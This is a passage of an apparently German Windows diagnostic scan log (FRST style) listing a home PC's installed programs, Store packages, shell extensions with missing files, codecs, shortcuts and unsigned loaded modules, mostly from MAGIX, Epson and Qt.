Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{9AA4DD93-94BF-22EA-C9D2-7084F304A31B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{379D900B-A785-6DB0-012E-434356A365B3}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{366C4FB5-CF6E-258B-418D-E6D29549A278}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B10089DE-934F-6E0F-683A-B788F89348DF}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
CD-LabelPrint (HKLM-x32\...\MediaNavigation.CDLabelPrint) (Version:  - )
CEWE Fotowelt (HKLM-x32\...\CEWE Fotowelt) (Version: 7.1.2 - CEWE Stiftung u Co. KGaA)
cewe-fotoservice.de (HKLM-x32\...\cewe-fotoservice.de) (Version: 7.0.3 - CEWE Stiftung u Co. KGaA)
Content Manager (HKLM-x32\...\Content Manager) (Version: 3.18.5.761538 - NNG Llc.)
Disketch Disc-Beschriftungssoftware (HKLM-x32\...\Disketch) (Version: 3.34 - NCH Software)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.94 - NVIDIA Corporation) Hidden
Druckerdeinstallation für EPSON XP-900 Series (HKLM\...\EPSON XP-900 Series) (Version:  - Seiko Epson Corporation)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 19.2 - Thüringer Landesfinanzdirektion)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson Printer Connection Checker (HKLM-x32\...\{189DE071-E0BC-4BA5-8E34-83D5ED12600B}) (Version: 3.2.0.0 - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
Epson Scan 2 (HKLM-x32\...\Epson Scan 2) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 3.00.04 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{28C66F35-69BF-4376-BC80-4D5F4808FF3C}) (Version: 4.6.1 - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.57.0.0 - Seiko Epson Corporation)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{39AB2E37-1A55-4292-A5D3-971E9F70D0F8}) (Version: 2.1.32.0 - MAGIX AG)
GoTo Opener (HKLM-x32\...\{C0F33C38-345C-4C02-B161-11389350C2A5}) (Version: 1.0.533 - LogMeIn, Inc.)
GoToMeeting 10.15.0.19228 (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\GoToMeeting) (Version: 10.15.0.19228 - LogMeIn, Inc.)
iTunes (HKLM\...\{053441A1-A8BD-486F-B06D-F2B478D5925E}) (Version: 12.9.6.3 - Apple Inc.)
MAGIX Cloud Import (HKLM\...\{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH) Hidden
MAGIX Cloud Import (HKLM\...\MX.{E2EC0850-84BF-4A86-842E-4A100473FB22}) (Version: 0.1.0.5 - MAGIX Software GmbH)
MAGIX Connect (HKLM\...\{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH) Hidden
MAGIX Connect (HKLM\...\MX.{B0C73D27-EB3E-4D0E-B40D-0141DAF708CC}) (Version: 3.0.0.1 - MAGIX Software GmbH)
MAGIX Foto & Grafik Designer (HKLM\...\{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH) Hidden
MAGIX Foto & Grafik Designer (HKLM-x32\...\MX.{493376E3-A01C-48CE-8ED6-5B2F4F5E9220}) (Version: 12.1.1.45250 - MAGIX Software GmbH)
MAGIX Foto Manager 16 Deluxe (HKLM\...\{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH) Hidden
MAGIX Foto Manager 16 Deluxe (HKLM-x32\...\MX.{5C06468B-7AB8-4E73-8794-AA6806EB930C}) (Version: 12.0.0.20 - MAGIX Software GmbH)
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG) Hidden
MAGIX Fotos auf DVD MX Deluxe (HKLM-x32\...\MAGIX_{66F2F163-9155-4776-9BE2-0955120C0E2F}) (Version: 11.0.2.80 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG) Hidden
MAGIX Screenshare (HKLM-x32\...\MAGIX_{C5152C6C-5AFB-4779-8576-F6FDE26185A7}) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM\...\{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH) Hidden
MAGIX Speed burnR (HKLM-x32\...\MX.{370FD2B5-6A2F-4BB9-8B5F-F5CE6F0C01E5}) (Version: 7.0.2.6 - MAGIX Software GmbH)
MAGIX Travel Maps (HKLM\...\{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH) Hidden
MAGIX Travel Maps (HKLM\...\MX.{278F1CA2-6459-40CC-ACCA-13E7F6C175CC}) (Version: 1.0.1.300 - MAGIX Software GmbH)
MAGIX Travel Maps Update (HKLM\...\{47A2B863-62A1-4A7D-8AC1-A293C8994747}) (Version: 1.0.1.385 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\{02C2B318-E2DF-4EC4-AD1B-9FF3DD774A04}) (Version: 11.0.0.42 - MAGIX AG) Hidden
MAGIX Video deluxe MX Plus (HKLM-x32\...\MAGIX_MSI_Videodeluxe18_plus) (Version: 11.0.0.42 - MAGIX AG)
MAGIX Video deluxe Plus (Demo) (HKLM\...\{57B24FA4-9B76-490A-8B80-B27F118E751A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 1) (HKLM\...\{4481CFAA-0E76-4076-9FB2-CECEF3D22FE3}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Designelemente 2) (HKLM\...\{27DFC18E-C49E-4F51-93DD-5E75CE301B9A}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 1) (HKLM\...\{395FA56C-DF0F-4836-A3BB-D705B38ABCA1}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Filmvorlagen 2) (HKLM\...\{B7E1A490-6793-4B18-A803-19AA04197762}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Fotoshow Maker-Stile) (HKLM\...\{388F55AA-7054-43FC-845C-E0A8F549B9AE}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (HKLM\...\MX.{7C50DDAC-FC47-4E7C-8EFD-0CCF6567F5C4}) (Version: 19.0.1.18 - MAGIX Software GmbH)
MAGIX Video deluxe Plus (Menüvorlagen) (HKLM\...\{9EAAA0FF-A318-4593-9616-D977655A8B68}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Migrate Content) (HKLM\...\{A0D08159-E17E-4002-8A91-4B29F0145CB8}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Soundtrack Maker-Stile) (HKLM\...\{D5FF70FA-55AD-4B31-87B7-3BB8CB7EED04}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Titeleffekte) (HKLM\...\{81AD8375-39AB-4EEB-9B08-2A9D50F64F91}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Überblendeffekte) (HKLM\...\{39FC2C3B-14F9-48EE-94CC-615459E1C171}) (Version: 19.0.0.0 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Update Service 5.7.33.77) (HKLM\...\{89C598BE-D4ED-3125-A8AF-406533E46B19}) (Version: 5.7.33.77 - MAGIX Software GmbH) Hidden
MAGIX Video deluxe Plus (Vorlagen und Effekte) (HKLM-x32\...\MAGIX_GlobalContent.Video_deluxe_Plus) (Version: 1.0.0.0 - MAGIX Software GmbH)
MAGIX Video deluxe Plus Update (HKLM\...\{D5BDA5D0-2661-430E-94A3-8472BF892554}) (Version: 16.0.4.102 - MAGIX Software GmbH) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24212 (HKLM-x32\...\{323dad84-0974-4d90-a1c1-e006c7fdbb7d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM-x32\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 de) (HKLM\...\Mozilla Firefox 84.0.2 (x64 de)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.2 - Mozilla)
Mozilla Thunderbird 78.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 78.6.0 (x86 de)) (Version: 78.6.0 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MyEpson Portal (HKLM-x32\...\{3361D415-BA35-4143-B301-661991BA6219}) (Version: 1.1.2.2 - SEIKO EPSON CORPORATION) Hidden
MyEpson Portal (HKLM-x32\...\MyEpson Portal) (Version:  - SEIKO EPSON Corporation)
mz-32 Simulator version 1.0 (HKLM-x32\...\{02920757-F57F-4724-83CC-A99C827792E2}_is1) (Version: 1.0 - Graupner)
Naviextras Toolbox Prerequesities (HKLM-x32\...\{537575D6-3B96-474C-BD8F-DFF667363DBD}) (Version: 1.0.0 - NNG Llc.)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 456.71 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 456.71 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.35 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
Photo & Graphic Designer Update (HKLM\...\{41D70490-924E-470F-847F-CD3BB1A65637}) (Version: 12.5.1.48446 - MAGIX Software GmbH) Hidden
Pinnacle Instant DVD Recorder (HKLM-x32\...\{EF781A5C-58F5-4BFD-87F9-E4F14D382F25}) (Version: 2.00.088 - )
proDAD Heroglyph 2.5 (HKLM-x32\...\proDAD-Heroglyph-2.5) (Version:  - )
proDAD Vitascene 1.0 (HKLM-x32\...\proDAD-Vitascene-1.0) (Version:  - )
Studio 11 (HKLM-x32\...\{110B1ADF-2EAE-4E8F-B501-D2A1E6D8ED9D}) (Version: 11.0 - Pinnacle Systems)
Studio 11 (HKLM-x32\...\{2F952048-3220-4AC7-A206-D01EFC774BB2}) (Version: 11.0.0.0 - Pinnacle Systems) Hidden
Studio 11 Bonus DVD (HKLM-x32\...\{45A1BF92-700A-4408-B95E-79F462E3D67D}) (Version: 11.0.0.0 - Pinnacle Systems)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{E1D7CB46-BAE9-4D58-99C4-582332B1755A}) (Version: 1.13.0.0 - Microsoft Corporation) Hidden
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22395 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows-Treiberpaket - Silicon Laboratories Inc. (silabser) Ports  (05/23/2018 6.7.6.2130) (HKLM\...\C9C3E5CCB43EEF685DD0E2BB4263DDC88C9B3834) (Version: 05/23/2018 6.7.6.2130 - Silicon Laboratories Inc.)
Yahoo! Desktop Login (HKLM-x32\...\{F9AEEC34-CF00-4CBD-9E36-DF9DC4002685}) (Version: 1.00.0001 - Pinnacle Systems) Hidden

Packages:
=========
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-09-13] (Microsoft Corporation)
Ihr Smartphone -> C:\Program Files\WindowsApps\Microsoft.YourPhone_1.20081.117.0_x64__8wekyb3d8bbwe [2020-09-05] (Microsoft Corporation)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-30] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-13] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad]
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-716491260-3257532223-3478221735-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Peter\AppData\Local\GoToMeeting\17359\G2MOutlookAddin64.dll => Keine Datei
ContextMenuHandlers2-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll -> Keine Datei
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\atiacm64.dll -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} =>  -> Keine Datei
ContextMenuHandlers5-x32: [InCDMenu] -> {950FF917-7A57-46BC-8017-59D9BF474000} => C:\Program Files (x86)\Ahead\InCD\incdshx.dll -> Keine Datei
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2020-10-01] (NVIDIA Corporation -> NVIDIA Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Drivers32: [VIDC.MJPG] => C:\Windows\SysWOW64\Pvmjpg30.dll [401408 2005-07-12] (Pegasus Imaging Corporation) [Datei ist nicht signiert]

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Peter\Favorites\Downloadseite von NCH Software.lnk -> hxxp://www.nchsoftware.com/de/index.htm
ShortcutWithArgument: C:\Users\Peter\Desktop\Photovoltaik.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> "hxxp:\\192.168.0.2"

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2018-06-14 11:18 - 2018-06-14 11:18 - 000011776 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libEGL.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002013696 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\libGLESv2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000739840 _____ () [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-12-17 10:11 - 2015-12-17 10:11 - 000132096 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\epnsm.dll
2009-10-21 16:39 - 2009-10-21 16:39 - 000291328 _____ (SEIKO EPSON CORPORATION) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON Software\Event Manager\LcMgr.dll
2019-02-22 16:01 - 2019-02-22 16:01 - 000704512 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Configration_00000171\MepCfg.dll
2020-04-17 09:15 - 2020-04-17 09:15 - 000577536 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\MepUploader_00000542\MepUploader.dll
2019-02-22 14:09 - 2019-02-22 14:09 - 000475136 _____ (Seiko Epson Corporation) [Datei ist nicht signiert] C:\Program Files (x86)\EPSON\MyEpson Portal\Online Manual_00000013\MepFAQ.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000213504 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrStyler.dll
2018-09-18 11:43 - 2018-09-18 11:43 - 000288256 _____ (simplitec GmbH) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\MrTracker.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000045568 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qgenericbearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000047616 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\bearer\qnativewifibearer.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000049664 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qdds.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000029696 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qgif.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000037376 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qicns.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000030208 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qico.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000459776 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjp2.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000236544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qjpeg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000275456 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qmng.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000023552 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qsvg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000022528 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtga.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000351744 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qtiff.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000021504 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwbmp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000374784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\imageformats\qwebp.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001212928 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\platforms\qwindows.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005500416 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Core.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005804544 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Gui.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 001064448 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Network.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 003189248 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Qml.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 002928128 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Quick.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000310784 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Svg.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 005446144 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\Qt5Widgets.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick.2\qtquick2plugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000072192 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Layouts\qquicklayoutsplugin.dll
2018-06-14 11:18 - 2018-06-14 11:18 - 000015360 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QtQuick\Window.2\windowplugin.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

